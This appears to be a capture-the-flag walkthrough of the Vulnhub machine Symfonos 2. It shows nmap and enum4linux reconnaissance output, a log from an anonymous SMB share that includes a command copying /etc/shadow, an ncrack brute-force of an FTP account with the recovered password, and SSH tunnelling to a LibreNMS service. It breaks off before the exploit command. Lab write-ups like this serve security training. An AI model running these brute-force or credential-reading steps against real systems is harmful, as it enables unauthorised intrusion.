Symfonos 2

Symfonos 2 Vulnhub Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/sym2 192.168.43.97

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 10:27 EDT
Nmap scan report for symfonos2 (192.168.43.97)
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1  Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:03:48:23 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2020-05-15T09:27:31-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-15T14:27:31
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.14 seconds

Enum4linux

enum4linux -a 192.168.43.97

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 11:08:47 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.43.97
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.43.97    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.43.97    |
 ============================================= 
Looking up status of 192.168.43.97
        SYMFONOS2       <00> -         B <ACTIVE>  Workstation Service
        SYMFONOS2       <03> -         B <ACTIVE>  Messenger Service
        SYMFONOS2       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.43.97    |
 ====================================== 
[+] Server 192.168.43.97 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.43.97    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.43.97    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.97 from smbclient: 
[+] Got OS info for 192.168.43.97 from srvinfo:
        SYMFONOS2      Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 192.168.43.97    |
 ============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================== 
|    Share Enumeration on 192.168.43.97    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS2

[+] Attempting to map shares on 192.168.43.97
//192.168.43.97/print$  Mapping: DENIED, Listing: N/A
//192.168.43.97/anonymous       Mapping: OK, Listing: OK
//192.168.43.97/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.43.97    |
 ===================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 192.168.43.97 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 192.168.43.97    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.43.97 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-629329663-2933547119-2337616968
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aeolus (Local User)
S-1-22-1-1001 Unix User\cronus (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-629329663-2933547119-2337616968 and logon username '', password ''
S-1-5-21-629329663-2933547119-2337616968-500 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-501 SYMFONOS2\nobody (Local User)
S-1-5-21-629329663-2933547119-2337616968-502 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-503 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-504 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-505 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-506 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-507 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-508 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-509 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-510 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-511 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-512 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-513 SYMFONOS2\None (Domain Group)
S-1-5-21-629329663-2933547119-2337616968-514 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-515 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-516 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-517 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-518 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-519 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-520 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-521 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-522 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-523 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-524 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-525 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-526 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-527 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-528 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-529 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-530 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-531 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-532 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-533 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-534 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-535 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-536 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-537 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-538 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-539 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-540 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-541 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-542 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-543 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-544 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-545 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-546 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-547 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-548 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-549 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-550 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1000 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1001 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1002 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1003 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1004 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1005 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1006 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1007 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1008 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1009 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1010 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1011 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1012 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1013 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1014 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1015 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1016 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1017 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1018 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1019 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1020 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1021 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1022 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1023 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1024 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1025 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1026 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1027 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1028 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1029 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1030 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1031 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1032 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1033 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1034 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1035 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1036 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1037 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1038 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1039 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1040 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1041 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1042 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1043 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1044 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1045 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1046 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1047 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1048 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1049 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1050 *unknown*\*unknown* (8)

 ============================================== 
|    Getting printer info for 192.168.43.97    |
 ============================================== 
No printers returned.


enum4linux complete on Fri May 15 11:09:08 2020

We can see that anonymous shared folder here

We then can use smbclient to see what's inside.

smblient

smbclient //192.168.43.97/anonymous

We can then ls to list all the available files inside the anonymous folder, then we saw a backup folder, change directory to that folder and get the log.txt by typing get log.txt

This is the content of log.txt

root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no

# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
;   wins server = w.x.y.z

# This will prevent nmbd to search for NetBIOS names through DNS.
   dns proxy = no

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
#   syslog only = no

# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
   syslog = 0

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.  
   passdb backend = tdbsam

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap uid = 10000-20000
;   idmap gid = 10000-20000
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 (default) means that usershare is disabled.
;   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

[homes]
   comment = Home Directories
   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes

root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName                      "ProFTPD Default Installation"
ServerType                      standalone
DefaultServer                   on

# Port 21 is the standard FTP port.
Port                            21

# Don't use IPv6 support by default.
UseIPv6                         off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask                           022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances                    30

# Set the user and group under which the server will run.
User                            aeolus
Group                           aeolus

# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~

# Normally, we want files to be overwriteable.
AllowOverwrite          on

# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
  DenyAll
</Limit>

# A basic anonymous configuration, no upload directories.  If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
  User                          ftp
  Group                         ftp

  # We want clients to be able to login with "anonymous" as well as "ftp"
  UserAlias                     anonymous ftp

  # Limit the maximum number of anonymous logins
  MaxClients                    10

  # We want 'welcome.msg' displayed at login, and '.message' displayed
  # in each newly chdired directory.
  #DisplayLogin                 welcome.msg
  #DisplayChdir                 .message

  # Limit WRITE everywhere in the anonymous chroot
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>

As we can see here we have a user called aeolus, so maybe we can brute force the ssh login using hydra

Exploitation

ncrack

ncrack -v -u aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.43.97

We can see the password for the user aeolus is sergioteamo

ftp

After that we can use ftp to login

ftp 192.168.43.97

Then I realized that we can ssh to the user to login into the user account.

ssh

ssh aeolus@192.168.43.97

I been looking for a lot of directories and I can't seem to find a way. After looking at walk-through, I found out that there is a apache directory

navigate to the /etc/apache, we can find a few folders and I go into the sites-enabled folder and found a file called librenms.conf

cat that file and we find out this.

we can see that there is a server running at localhost port 8080.

We now need to port forward so that we can access the shell by using ssh tunneling.

ssh tunneling

ssh -L 9000:localhost:8080 aeolus@192.168.43.97

Then we can use our browser to browse the web-page.

Exploit

it is LibreNMS. I went to searchsploit and did a quick lookup and got the exploit

After that, copy the exploit to a directory and set up the exploit

The exploit actually requires the URL, cookies and remote host and port.

I use BurpSuite to intercept the traffic and get the cookies from it

Before run the command, remember to set up a listener on our machine

Command should looks like this

